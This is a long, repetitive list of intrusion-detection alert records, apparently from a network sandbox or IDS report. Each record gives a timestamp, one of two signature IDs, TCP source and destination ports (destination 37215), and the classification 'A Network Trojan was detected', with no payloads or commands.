          Timestamp:06/08/24-15:05:32.410737
          SID:2829579
          Source Port:48438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463320
          SID:2835222
          Source Port:40954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.893924
          SID:2829579
          Source Port:35470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806340
          SID:2829579
          Source Port:47520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741877
          SID:2835222
          Source Port:35048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.233516
          SID:2835222
          Source Port:56378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270791
          SID:2835222
          Source Port:42046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861549
          SID:2835222
          Source Port:56856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.862413
          SID:2829579
          Source Port:37126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740109
          SID:2835222
          Source Port:54684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016095
          SID:2829579
          Source Port:44068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671383
          SID:2829579
          Source Port:57410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797534
          SID:2835222
          Source Port:57568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.841747
          SID:2835222
          Source Port:55482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.462967
          SID:2829579
          Source Port:48186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040459
          SID:2835222
          Source Port:38512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.440830
          SID:2835222
          Source Port:42318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.460900
          SID:2829579
          Source Port:44708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733607
          SID:2829579
          Source Port:39408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732726
          SID:2829579
          Source Port:47602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352893
          SID:2829579
          Source Port:53540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.893616
          SID:2829579
          Source Port:56196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729969
          SID:2835222
          Source Port:55178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893323
          SID:2829579
          Source Port:60366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708109
          SID:2829579
          Source Port:55060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155455
          SID:2829579
          Source Port:49078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178847
          SID:2829579
          Source Port:44468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551663
          SID:2829579
          Source Port:45108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.134278
          SID:2835222
          Source Port:43814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274330
          SID:2835222
          Source Port:38314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444967
          SID:2829579
          Source Port:57422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263931
          SID:2829579
          Source Port:36560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742285
          SID:2835222
          Source Port:51042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788819
          SID:2829579
          Source Port:40168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730989
          SID:2835222
          Source Port:38838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.184046
          SID:2829579
          Source Port:60942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549667
          SID:2835222
          Source Port:51476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040367
          SID:2835222
          Source Port:49466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155434
          SID:2835222
          Source Port:60632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.192344
          SID:2835222
          Source Port:56894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798523
          SID:2835222
          Source Port:36386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729771
          SID:2835222
          Source Port:46988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112127
          SID:2829579
          Source Port:57674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.056724
          SID:2829579
          Source Port:38616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896976
          SID:2835222
          Source Port:53654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.409858
          SID:2829579
          Source Port:39860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709262
          SID:2835222
          Source Port:51698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.813895
          SID:2829579
          Source Port:53776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005639
          SID:2829579
          Source Port:48980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463943
          SID:2829579
          Source Port:56088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264242
          SID:2835222
          Source Port:37526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783551
          SID:2829579
          Source Port:36436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115347
          SID:2829579
          Source Port:36824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161175
          SID:2829579
          Source Port:48332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153392
          SID:2829579
          Source Port:47232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021711
          SID:2835222
          Source Port:52670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708848
          SID:2835222
          Source Port:37164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.116577
          SID:2835222
          Source Port:52500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.025804
          SID:2829579
          Source Port:57906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806164
          SID:2835222
          Source Port:57910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730875
          SID:2829579
          Source Port:46602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671816
          SID:2835222
          Source Port:44730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467482
          SID:2829579
          Source Port:46068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109178
          SID:2835222
          Source Port:45226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044777
          SID:2835222
          Source Port:36076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600869
          SID:2835222
          Source Port:40142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158523
          SID:2835222
          Source Port:46014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263643
          SID:2835222
          Source Port:48586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799505
          SID:2829579
          Source Port:42938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.409785
          SID:2829579
          Source Port:57506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.071155
          SID:2829579
          Source Port:54636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158463
          SID:2835222
          Source Port:45226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136095
          SID:2829579
          Source Port:52206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746607
          SID:2829579
          Source Port:55360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509072
          SID:2829579
          Source Port:42014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.881297
          SID:2829579
          Source Port:42778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.553017
          SID:2835222
          Source Port:40920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912831
          SID:2835222
          Source Port:34126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600607
          SID:2829579
          Source Port:34728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.818737
          SID:2835222
          Source Port:56104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730693
          SID:2835222
          Source Port:47284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259043
          SID:2835222
          Source Port:50344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355709
          SID:2829579
          Source Port:54164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239370
          SID:2835222
          Source Port:49154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517963
          SID:2835222
          Source Port:50772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600318
          SID:2835222
          Source Port:59506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406489
          SID:2835222
          Source Port:51598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744442
          SID:2835222
          Source Port:44506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747977
          SID:2835222
          Source Port:51508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021853
          SID:2835222
          Source Port:52542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.350708
          SID:2835222
          Source Port:56980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670500
          SID:2829579
          Source Port:42672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395341
          SID:2829579
          Source Port:34946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460619
          SID:2829579
          Source Port:48340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857462
          SID:2829579
          Source Port:46380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471358
          SID:2835222
          Source Port:33094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.078450
          SID:2829579
          Source Port:60048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407393
          SID:2829579
          Source Port:43540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734367
          SID:2829579
          Source Port:57104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239930
          SID:2829579
          Source Port:40364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791844
          SID:2829579
          Source Port:37032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.268466
          SID:2835222
          Source Port:54252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155293
          SID:2829579
          Source Port:56588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732005
          SID:2835222
          Source Port:33546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787001
          SID:2835222
          Source Port:48750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546595
          SID:2835222
          Source Port:53848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509003
          SID:2829579
          Source Port:33022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161716
          SID:2835222
          Source Port:37922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018325
          SID:2829579
          Source Port:37628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467662
          SID:2835222
          Source Port:55298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.066270
          SID:2829579
          Source Port:42786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792433
          SID:2829579
          Source Port:36122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.892323
          SID:2835222
          Source Port:39872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.860965
          SID:2835222
          Source Port:56120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781853
          SID:2829579
          Source Port:38766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356022
          SID:2835222
          Source Port:41988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783811
          SID:2829579
          Source Port:39714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.595253
          SID:2835222
          Source Port:47850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.807005
          SID:2835222
          Source Port:52316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019143
          SID:2835222
          Source Port:36072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017232
          SID:2835222
          Source Port:37028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044742
          SID:2829579
          Source Port:45842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.061814
          SID:2829579
          Source Port:56836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.469037
          SID:2829579
          Source Port:36450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.180161
          SID:2829579
          Source Port:37254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468120
          SID:2829579
          Source Port:44800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729380
          SID:2835222
          Source Port:58056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042920
          SID:2829579
          Source Port:50634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.462943
          SID:2835222
          Source Port:55286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038198
          SID:2835222
          Source Port:46580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.820889
          SID:2829579
          Source Port:45020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792776
          SID:2835222
          Source Port:50266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036244
          SID:2829579
          Source Port:56326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242951
          SID:2835222
          Source Port:51346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272178
          SID:2829579
          Source Port:45262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179030
          SID:2835222
          Source Port:57076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783735
          SID:2835222
          Source Port:45520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731889
          SID:2829579
          Source Port:46502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730208
          SID:2829579
          Source Port:52896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035090
          SID:2829579
          Source Port:53932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857478
          SID:2835222
          Source Port:53184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550754
          SID:2829579
          Source Port:60884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789575
          SID:2835222
          Source Port:60052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173725
          SID:2835222
          Source Port:40274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542341
          SID:2835222
          Source Port:48106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107544
          SID:2829579
          Source Port:33514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110882
          SID:2829579
          Source Port:43162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403701
          SID:2835222
          Source Port:54402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465680
          SID:2835222
          Source Port:42742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746260
          SID:2835222
          Source Port:46064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896563
          SID:2835222
          Source Port:47930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040294
          SID:2829579
          Source Port:58928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.155341
          SID:2829579
          Source Port:59308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446944
          SID:2835222
          Source Port:35992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353507
          SID:2835222
          Source Port:38208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513973
          SID:2829579
          Source Port:35386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274033
          SID:2835222
          Source Port:46318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108934
          SID:2829579
          Source Port:35072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509476
          SID:2829579
          Source Port:57248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709169
          SID:2835222
          Source Port:34858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174272
          SID:2829579
          Source Port:56802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351562
          SID:2835222
          Source Port:34472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.555437
          SID:2829579
          Source Port:46782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353608
          SID:2835222
          Source Port:51652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895657
          SID:2835222
          Source Port:45246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176324
          SID:2835222
          Source Port:58658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860343
          SID:2835222
          Source Port:59374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353672
          SID:2835222
          Source Port:37728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706427
          SID:2835222
          Source Port:37560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240122
          SID:2835222
          Source Port:42366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266041
          SID:2835222
          Source Port:37078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.268634
          SID:2835222
          Source Port:48084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.675189
          SID:2835222
          Source Port:36268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.800600
          SID:2835222
          Source Port:44992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.853444
          SID:2829579
          Source Port:53556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467662
          SID:2829579
          Source Port:47538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911333
          SID:2835222
          Source Port:40572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.843915
          SID:2829579
          Source Port:35536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468175
          SID:2835222
          Source Port:56236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.842310
          SID:2835222
          Source Port:33336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912428
          SID:2829579
          Source Port:53338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017622
          SID:2829579
          Source Port:57912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512923
          SID:2829579
          Source Port:48322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128065
          SID:2835222
          Source Port:40594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242270
          SID:2829579
          Source Port:48432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107722
          SID:2829579
          Source Port:44032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787085
          SID:2829579
          Source Port:46118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043062
          SID:2829579
          Source Port:55552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176611
          SID:2835222
          Source Port:37100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.598715
          SID:2835222
          Source Port:43010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705398
          SID:2829579
          Source Port:48622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731303
          SID:2835222
          Source Port:55964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705583
          SID:2835222
          Source Port:58712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110755
          SID:2835222
          Source Port:38698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.163134
          SID:2835222
          Source Port:52260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159820
          SID:2835222
          Source Port:49816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860461
          SID:2835222
          Source Port:33708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005720
